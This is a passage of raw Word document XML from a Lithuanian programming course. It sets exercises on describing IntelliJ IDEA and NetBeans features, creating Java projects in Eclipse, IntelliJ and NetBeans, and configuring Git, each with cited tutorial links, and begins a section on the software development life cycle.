          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="426" w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Aprašant pagrindines Intellij Idea IDE aplinkos funkcijas (Features) naudokite:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">JetBrain (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Making Development an Enjoyable Experience</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId178" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.jetbrains.com/idea/features.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>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8 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. APRAŠYKITE PAGRINDINES NETBEANS IDE APLINKOS FUNKCIJAS (FEATURES)</w:t>
      </w:r>
      <w:r w:rsidR="00714C50">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="426" w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Aprašant pagrindines Netbeans IDE aplinkos funkcijas (Features) naudokite:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NetBeans (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NetBeans IDE - The Smarter and Faster Way to Code </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId179" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://netbeans.org/features.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB37D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9 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE NAUJĄ JAVA PROJEKTĄ SU ECLIPSE IDE</w:t>
      </w:r>
      <w:r w:rsidR="00822850">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="426" w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Apie naujo Java projekto kūrimą Eclipse IDE aplinkoje galite paskaityti čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. TutorialsPoint (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Eclipse - Create Java Project</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId180" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.tutorialspoint.com/eclipse/eclipse_create_java_project.htm.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. TutorialsPoint (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Eclipse - Create Java Package</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId181" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.tutorialspoint.com/eclipse/eclipse_create_java_package.htm.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3. TutorialsPoint (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Eclipse - Create Java Class</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId182" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.tutorialspoint.com/eclipse/eclipse_create_java_class.htm.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB37D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10 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURKITE NAUJĄ JAVA PROJEKTĄ SU INTELLIJ IDEA IDE</w:t>
      </w:r>
      <w:r w:rsidR="006B4460">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="426" w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Apie naujo Java projekto kūrimą Intellij Idea IDE aplinkoje galite paskaityti čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">JetBrain (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Create your first Java application</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId183" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.jetbrains.com/help/idea/creating-and-running-your-first-java-application.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB37D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11 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE NAUJĄ JAVA PROJEKTĄ SU NETBEANS IDE</w:t>
      </w:r>
      <w:r w:rsidR="003356FB">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="426" w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Apie naujo Java projekto kūrimą Intellij Idea IDE aplinkoje galite paskaityti čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">NetBeans (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="003356FB">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>https://netbeans.org/kb/docs/java/quickstart.html</w:t>
      </w:r>
      <w:r w:rsidRPr="003356FB">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId184" w:history="1">
        <w:r w:rsidRPr="009A0488">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://netbeans.org/kb/docs/java/quickstart.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009A0488">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12 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Sukurtam Java projektui (</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>) sukonfigūruokite Git įrankį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="426" w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git konfigūravimo instrukcija Eclipse IDE Java projektui:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">EclipseSource (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Installing EGit in Eclipse</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId185" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://eclipsesource.com/blogs/tutorials/egit-tutorial.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB37D6">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>13 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Sukurtam Java projektui (</w:t>
      </w:r>
      <w:r w:rsidRPr="00681BD2">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>10 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>) sukonfigūruokite Git įrankį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="426" w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git konfigūravimo instrukcija Intellij Idea IDE Java projektui:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">JetBrain (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId186" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.jetbrains.com/help/idea/using-git-integration.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB37D6">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="53"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="357" w:hanging="357"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="991" w:name="_Toc133909966"/>
      <w:bookmarkStart w:id="992" w:name="_Toc10444037"/>
      <w:bookmarkStart w:id="993" w:name="_Toc13095584"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="994" w:name="_Toc13833478"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Sekti programavimo darbų vykdymą naudojant komandinio darbų planavimo sistemas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="991"/>
      <w:bookmarkEnd w:id="992"/>
      <w:bookmarkEnd w:id="993"/>
      <w:bookmarkEnd w:id="994"/>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xml:space="preserve"> UŽRAŠYKITE PAGRINDINIUS PROGRAMINĖS ĮRANGOS KŪRIMO ETAPUS</w:t>
      </w:r>
      <w:r w:rsidR="00BB37D6">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Pagrindiniai programinės įrangos kūrimo etapai: planavimas (1), reikalavimų surinkimas ir analizė (2), dizaino ir architektūros projektavimas (3), programinės įrangos kūrimas (kodo rašymas) ir testavimas(4), integravimas ir testavimas (5), diegimas ir palaikymas (6).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Papildomai galite paskaityti:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Wikipedia (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Systems development life cycle</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId187" w:history="1">
        <w:r w:rsidRPr="00BB37D6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Systems_development_life_cycle.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB37D6">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:eastAsia="SimSun"/>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75699FC5" wp14:editId="70232F71">
            <wp:extent cx="2928620" cy="2928620"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="233" name="Picture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25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28620" cy="2928620"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06"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APRAŠYKITE PROGRAMINĖS ĮRANGOS GYVAVIMO CIKLĄ</w:t>
      </w:r>
      <w:r w:rsidR="00BB37D6">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Programinės įrangos gyvavimo ciklas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Planavimas:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> šis etapas apima projektų ir produktų valdymo aspektus. Tai gali būti: išteklių paskirstymas, pajėgumų planavimas, projekto planavimas, sąnaudų įvertinimas ir t.t.. Planavimo etapo rezultatai apima: projekto planus, tvarkaraščius, sąnaudų įvertinimus ir pirkimų reikalavimus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Reikalavimų surinkimas ir analizė:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
